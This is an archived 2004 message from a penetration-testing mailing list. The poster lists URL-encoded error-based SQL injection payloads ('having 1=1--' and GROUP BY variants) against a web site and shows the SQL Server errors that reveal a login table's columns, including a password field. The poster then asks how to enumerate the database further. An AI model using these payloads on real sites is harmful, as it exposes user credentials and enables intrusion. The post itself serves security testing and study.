Penetration Testing mailing list archives
Re: Hacme Bank
From: KrK <krk41 () yahoo com>
Date: Fri, 17 Sep 2004 05:37:53 -0700 (PDT)
Hi List, I have been doing testing of a web site and have found all the errors as detailed in the advanced sql injection paper by ngsoftware and in Hacme bank. I have been stuck on the way because of a different error and am unable to enumerate the database further. Here is the list of tests that i have done and the corresponding output, if anyone could suggest on how to enumerate the rest of the table fields it would be great. step 1: userid='%20having%201%3d1%2d%2d (encoded form of ' having 1=1--) result 1: Column 'logindetls.userid' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. step 2:'%20GROUP%20BY%20logindetls.userid%20having%201=1-- result 2: Column 'logindetls.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. step 3:userid='%20GROUP%20BY%20logindetls.userid,logindetls.password%20having%201=1-- result 3: Column 'logindetls.name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. and so on and so forth until i reach a point where i get this error: [Microsoft][ODBC SQL Server Driver][SQL Server]:the text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator The application, i feel, stores text data in one of the fields which results in the generation of this error.Has anyone in the list come across this? any clues on how to enumerate the database further? Thanking you, Krk " DON'T WORRY BE HAPPY, EVERY NIGHT YOU HAVE SOME TROUBLE, IF YOU WORRY YOU MAKE IT DOUBLE, SO DON'T WORRY BE HAPPY NOW...." ===== " DON'T WORRY BE HAPPY, EVERY NIGHT YOU HAVE SOME TROUBLE, IF YOU WORRY YOU MAKE IT DOUBLE, SO DON'T WORRY BE HAPPY NOW...." __________________________________ Do you Yahoo!? Yahoo! Mail is new and improved - Check it out! http://promotions.yahoo.com/new_mail ------------------------------------------------------------------------------ Ethical Hacking at the InfoSec Institute. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. Check out our Advanced Hacking course, learn to write exploits and attack security infrastructure. Attend a course taught by an expert instructor with years of in-the-field pen testing experience in our state of the art hacking lab. Master the skills of an Ethical Hacker to better assess the security of your organization. http://www.infosecinstitute.com/courses/ethical_hacking_training.html -------------------------------------------------------------------------------
Current thread:
- Hacme Bank Mark Curphey (Sep 08)
- Re: Hacme Bank Rush Molekilla (Sep 09)
- Re: Problem with Hacme Bank Install Martin Mkrtchian (Sep 09)
- <Possible follow-ups>
- RE: Hacme Bank Jeremy Junginger (Sep 09)
- RE: Hacme Bank Mark Curphey (Sep 11)
- Re: Hacme Bank KrK (Sep 17)